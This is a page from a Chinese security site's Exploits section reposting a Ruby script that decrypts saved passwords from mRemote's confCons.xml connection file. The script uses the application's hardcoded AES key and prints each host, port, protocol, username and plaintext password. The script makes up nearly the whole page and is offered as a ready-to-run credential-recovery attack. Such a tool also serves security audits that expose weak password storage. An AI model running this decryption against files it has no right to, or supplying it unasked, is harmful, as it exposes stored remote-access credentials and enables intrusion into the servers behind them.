首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
mRemote Offline Password Decrypt
来源:adrianomarciomonteiro.blogspot.com.br 作者:Monteiro 发布时间:2014-04-25  
################################################################################
#																			   #
# mRemote Offline Password Decrypt											   #
# Based on Metasploit Module enum_mremote_pwds.rb from David Maloney		   #
# Autor: Adriano Marcio Monteiro											   #
# E-mail: adrianomarciomonteiro@gmail.com									   #
# Blog: adrianomarciomonteiro.blogspot.com.br								   #
#																			   #
# Usage: ruby mRemoteOffPwdsDecrypt.rb confCons.xml							   #
#																			   #
################################################################################
require 'rexml/document'
require 'openssl'
require 'optparse'
include REXML
case ARGV[0]
when "confCons.xml"
	@secret=  "\xc8\xa3\x9d\xe2\xa5\x47\x66\xa0\xda\x87\x5f\x79\xaa\xf1\xaa\x8c"
	xmlfile = File.new(ARGV[0])
	xmldoc = Document.new(xmlfile)
	xmldoc.elements.each("Connections/Node"){|e|
		host = e.attributes['Hostname']
		port = e.attributes['Port']
		proto = e.attributes['Protocol']
		user = e.attributes['Username']
		domain = e.attributes['Domain']
		epassword= e.attributes['Password']
		next if epassword == nil or epassword== ""
		decoded = epassword.unpack("m*")[0]
		iv= decoded.slice!(0,16)
		decipher = OpenSSL::Cipher::AES.new(128, :CBC)
		decipher.decrypt
		decipher.key = @secret
		decipher.iv = iv if iv != nil
		pass = decipher.update(decoded) + decipher.final
		print "HOST:#{host} PORT:#{port} PROTO:#{proto} USER:#{user} PASS:#{pass}\n"
	}
else
  	print "mRemote Offline Password Decrypt.\n"
	print "Based on Metasploit Module enum_mremote_pwds.rb by David Maloney\n"
	print "Author: Adriano Marcio Monteiro\n"
	print "E-mail: adrianomarciomonteiro@gmail.com\n"
	print "Blog: adrianomarciomonteiro.blogspot.com.br\n\n"
	print "Usage: ruby mRemoteOffPwdsDecrypt.rb confCons.xml\n\n"
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Acunetix 8 Scanner Buffer Over
·JRuby Sandbox 0.2.2 Bypass
·Acunetix 8 build 20120704 - Re
·cFos Personal Net 3.09 Heap Co
·Bonefire v.0.7.1 - Reinstall A
·Kolibri 2.0 GET Request - Stac
·No-CMS 0.6.6 rev 1 - Admin Acc
·Symantec Endpoint Protection M
·Media Player Classic 1.3.1752.
·Wireshark 1.8.12/1.10.5 wireta
·ATSEngine credential disclosur
·Mac OS X NFS Mount Privilege E
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved